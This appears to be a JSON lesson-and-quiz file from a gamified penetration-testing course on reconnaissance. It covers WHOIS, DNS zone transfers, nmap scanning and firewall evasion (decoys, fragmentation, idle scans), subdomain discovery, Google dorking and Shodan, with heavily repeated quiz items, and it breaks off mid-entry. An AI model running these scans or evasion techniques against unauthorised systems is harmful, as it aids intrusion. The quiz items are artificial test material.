[{"id":"passive-recon","cat":"Reconnaissance","title":"Passive Recon Intro","diff":1,"xp":50,"intro":"Gather intel without touching the target.","sections":[{"type":"text","content":"Passive recon uses public sources: WHOIS, DNS, social media, cached pages."},{"type":"code","lang":"bash","content":"whois example.com\ndig example.com ANY"},{"type":"text","content":"Understanding what you find is as important as finding it. Every piece of recon data is a potential entry point \u2014 an open port is a door, a leaked credential is a key, a misconfigured service is a window left open. Think like an attacker: what does this information let me do next?"},{"type":"tip","content":"Always document your findings as you go. Create a structured notes file with categories: domains, IPs, emails, technologies, credentials, and potential entry points. Good notes save hours of re-work."},{"type":"task","content":"Set up a target in a lab (HackTheBox, TryHackMe, or a local VM). Run a full passive recon workflow: WHOIS, DNS records, certificate transparency, and web archive search. Document everything you find in a structured format before touching the target with any active scan."},{"type":"quiz","q":"Which is NOT passive?","opts":["Port scanning","WHOIS","Google dorking","DNS records"],"ans":0},{"type":"quiz","q":"What is the main risk of active recon?","opts":["It's slow","The target can detect your scanning","It costs money","It requires admin access"],"ans":1},{"type":"quiz","q":"Which tool is best for subdomain enumeration?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"active-recon","cat":"Reconnaissance","title":"Active Recon Intro","diff":1,"xp":50,"intro":"Directly probe the target.","sections":[{"type":"text","content":"Active recon sends packets to the target. It's detectable."},{"type":"code","lang":"bash","content":"nmap -sV -sC 10.10.10.1"},{"type":"text","content":"Understanding what you find is as important as finding it. Every piece of recon data is a potential entry point \u2014 an open port is a door, a leaked credential is a key, a misconfigured service is a window left open. Think like an attacker: what does this information let me do next?"},{"type":"tip","content":"Always document your findings as you go. Create a structured notes file with categories: domains, IPs, emails, technologies, credentials, and potential entry points. Good notes save hours of re-work."},{"type":"task","content":"Set up a target in a lab (HackTheBox, TryHackMe, or a local VM). Run a full passive recon workflow: WHOIS, DNS records, certificate transparency, and web archive search. Document everything you find in a structured format before touching the target with any active scan."},{"type":"quiz","q":"What makes recon active?","opts":["Google","Probing the target directly","Public docs","Social media"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike Network"],"ans":0},{"type":"quiz","q":"What does a WHOIS query reveal?","opts":["Server vulnerabilities","Domain registration details","Passwords","Network traffic"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"nmap-basics","cat":"Reconnaissance","title":"Nmap Basics","diff":1,"xp":75,"intro":"Network scanning fundamentals.","sections":[{"type":"text","content":"Nmap discovers hosts, services, and OS."},{"type":"code","lang":"bash","content":"nmap -sS 10.10.10.1\nnmap -sV 10.10.10.1\nnmap -A 10.10.10.1"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"-sS does what?","opts":["Full connect","SYN stealth scan","UDP","Ping"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","User credentials"],"ans":1},{"type":"quiz","q":"What is the main risk of active recon?","opts":["It's slow","The target can detect your scanning","It costs money","It requires admin access"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"nmap-scripts","cat":"Reconnaissance","title":"Nmap NSE Scripts","diff":2,"xp":150,"intro":"Automate vuln detection with NSE.","sections":[{"type":"text","content":"NSE extends nmap with Lua scripts."},{"type":"code","lang":"bash","content":"nmap -sC 10.10.10.1\nnmap --script=vuln 10.10.10.1"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"NSE uses what language?","opts":["Python","Ruby","Lua","JS"],"ans":2},{"type":"quiz","q":"Which tool is best for subdomain enumeration?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike Network"],"ans":0},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"nmap-advanced","cat":"Reconnaissance","title":"Nmap Advanced","diff":3,"xp":200,"intro":"Firewall evasion and stealth.","sections":[{"type":"text","content":"Fragment packets, use decoys, idle scans."},{"type":"code","lang":"bash","content":"nmap -f 10.10.10.1\nnmap -D RND:10 10.10.10.1\nnmap -sI zombie 10.10.10.1"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Idle scan achieves?","opts":["Speed","Target never sees your IP","UDP","OS detect"],"ans":1},{"type":"quiz","q":"What does a WHOIS query reveal?","opts":["Server vulnerabilities","Domain registration details","Passwords","Network traffic"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","User credentials"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"dns-enum","cat":"Reconnaissance","title":"DNS Enumeration","diff":1,"xp":75,"intro":"Extract DNS records.","sections":[{"type":"text","content":"DNS reveals subdomains, mail servers, nameservers."},{"type":"code","lang":"bash","content":"dig axfr @ns1.example.com example.com\ndig MX example.com"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Zone transfer query type?","opts":["MX","AXFR","ANY","PTR"],"ans":1},{"type":"quiz","q":"What is the main risk of active recon?","opts":["It's slow","The target can detect your scanning","It costs money","It requires admin access"],"ans":1},{"type":"quiz","q":"Which tool is best for subdomain enumeration?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"subdomain-disc","cat":"Reconnaissance","title":"Subdomain Discovery","diff":1,"xp":100,"intro":"Find hidden subdomains.","sections":[{"type":"text","content":"Subdomains host dev, staging, admin panels."},{"type":"code","lang":"bash","content":"amass enum -d example.com\nsubfinder -d example.com"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"CT log tool?","opts":["nmap","crt.sh","hydra","john"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike Network"],"ans":0},{"type":"quiz","q":"What does a WHOIS query reveal?","opts":["Server vulnerabilities","Domain registration details","Passwords","Network traffic"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"google-dork","cat":"Reconnaissance","title":"Google Dorking","diff":1,"xp":75,"intro":"Advanced Google operators.","sections":[{"type":"text","content":"Find sensitive files, login pages, exposed databases."},{"type":"code","lang":"http","content":"site:example.com filetype:pdf\nsite:example.com inurl:admin"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Domain restriction operator?","opts":["inurl:","intitle:","site:","filetype:"],"ans":2},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","User credentials"],"ans":1},{"type":"quiz","q":"What is the main risk of active recon?","opts":["It's slow","The target can detect your scanning","It costs money","It requires admin access"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"shodan-recon","cat":"Reconnaissance","title":"Shodan Recon","diff":2,"xp":125,"intro":"Query Shodan for exposed devices.","sections":[{"type":"text","content":"Shodan indexes every internet-facing device."},{"type":"code","lang":"bash","content":"shodan search 'org:\"Target Corp\"'\nshodan host 93.184.216.34"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Shodan indexes?","opts":["Web pages","Internet devices and services","Social media","Emails"],"ans":1},{"type":"quiz","q":"Which tool is best for subdomain enumeration?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike Network"],"ans":0},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User 